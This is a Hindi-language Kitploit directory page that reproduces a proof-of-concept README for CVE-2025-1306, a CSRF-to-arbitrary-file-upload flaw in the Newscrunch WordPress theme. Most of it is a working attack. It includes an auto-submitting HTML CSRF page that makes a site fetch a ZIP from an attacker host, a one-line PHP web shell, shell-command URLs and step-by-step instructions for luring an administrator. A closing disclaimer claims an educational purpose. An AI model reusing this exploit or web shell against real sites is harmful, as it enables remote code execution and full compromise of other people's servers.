Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/nxploited/cve-2025-1306
फ़िशिंग उपकरणपेलोड जनरेशनशोषणवेब एप्लिकेशन शोषणलर्निंग और शिक्षा
GitHubnxploited/cve-2025-1306

CVE-2025-1306

Newscrunch <= 1.8.4 - क्रॉस-साइट अनुरोध जालसाजी से मनमानी फ़ाइल अपलोड

रिपॉजिटरी देखें
531 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Newscrunch शोषण (CVE-2025-1306)

🚨 अवलोकन

यह शोषण Newscrunch WordPress थीम में एक क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) से मनमाना फ़ाइल अपलोड कमज़ोरी (CVE-2025-1306) को लक्षित करता है। newscrunch_install_and_activate_plugin() फ़ंक्शन में nonce सत्यापन की कमी के कारण, एक अप्रमाणित हमलावर एक लॉग-इन व्यवस्थापक को सर्वर पर मनमानी फ़ाइलें अपलोड करने के लिए धोखा दे सकता है, जिससे रिमोट कोड निष्पादन (RCE) हो सकता है।


🔥 कमज़ोरी विवरण

  • CVE ID: CVE-2025-1306
  • प्रभावित सॉफ़्टवेयर: Newscrunch WordPress थीम (<= 1.8.4)
  • CWE वर्गीकरण: CWE-352 - क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF)
  • CVSS स्कोर: 8.8 (उच्च)
  • वेक्टर: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
  • प्रकाशन तिथि: 4 मार्च, 2025

🛑 गंभीरता और प्रभाव

  • ✅ रिमोट कोड निष्पादन (RCE)
  • ✅ पूर्ण सिस्टम समझौता
  • ✅ CSRF-आधारित मनमाना फ़ाइल अपलोड
  • ✅ अप्रमाणित हमला वेक्टर

शोषणीयता: व्यवस्थापक को एक तैयार किए गए दुर्भावनापूर्ण लिंक पर जाना आवश्यक है।


📜 शोषण कोड

यह शोषण एक प्रमाणित व्यवस्थापक को CSRF हमला करने के लिए मजबूर करता है जो एक वेब शेल युक्त दुर्भावनापूर्ण ZIP फ़ाइल अपलोड करता है।

🔹 PoC - HTML शोषण

root@kitploit:~
<!DOCTYPE html>
<html>
<head>
    <title>CSRF Exploit CVE-2025-1306 By Nxploit ,Khaled AlEnazi</title>
</head>
<body>
    <h2>Click anywhere to load content...</h2>

    <script>
        function sendExploit() {
            var form = document.createElement("form");
            form.method = "POST";
            form.action = "http://target.com/wp-admin/admin-ajax.php?action=newscrunch_install_activate_plugin";

            var input = document.createElement("input");
            input.type = "hidden";
            input.name = "plugin_url";
            input.value = "http://attacker.com/shell.zip";

            form.appendChild(input);
            document.body.appendChild(form);
            form.submit();
        }

        
        window.onload = function() {
            sendExploit();
        };
    </script>
</body>
</html>

📌 बदलें:

  • http://target.com/ को कमज़ोर WordPress साइट से
  • http://attacker.com/shell.zip को एक दुर्भावनापूर्ण ZIP पेलोड से जिसमें वेब शेल हो।

🔹 दुर्भावनापूर्ण PHP शेल उदाहरण

root@kitploit:~
<?php system($_GET['cmd']); ?>

📌 सफल शोषण के बाद, शेल तक पहुँचें:

root@kitploit:~
http://target.com/wp-content/plugins/shell.php?cmd=whoami

🚀 उपयोग कैसे करें

  1. HTML फ़ाइल को होस्ट करें हमलावर-नियंत्रित वेबसाइट पर।
  2. प्रमाणित WordPress व्यवस्थापक को दुर्भावनापूर्ण लिंक भेजें।
  3. व्यवस्थापक द्वारा पृष्ठ पर जाने पर, शेल स्वचालित रूप से अपलोड हो जाता है।
  4. रिमोट कमांड निष्पादित करें इसका उपयोग करके:
    root@kitploit:~
    http://target.com/wp-content/plugins/shell.php?cmd=ls
    

⚠️ अस्वीकरण

यह उपकरण केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए है। कमज़ोरियों का अनधिकृत शोषण अवैध है और कानून द्वारा दंडनीय है। लेखक इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है। जिम्मेदारी से उपयोग करें।

टूल डाउनलोड करें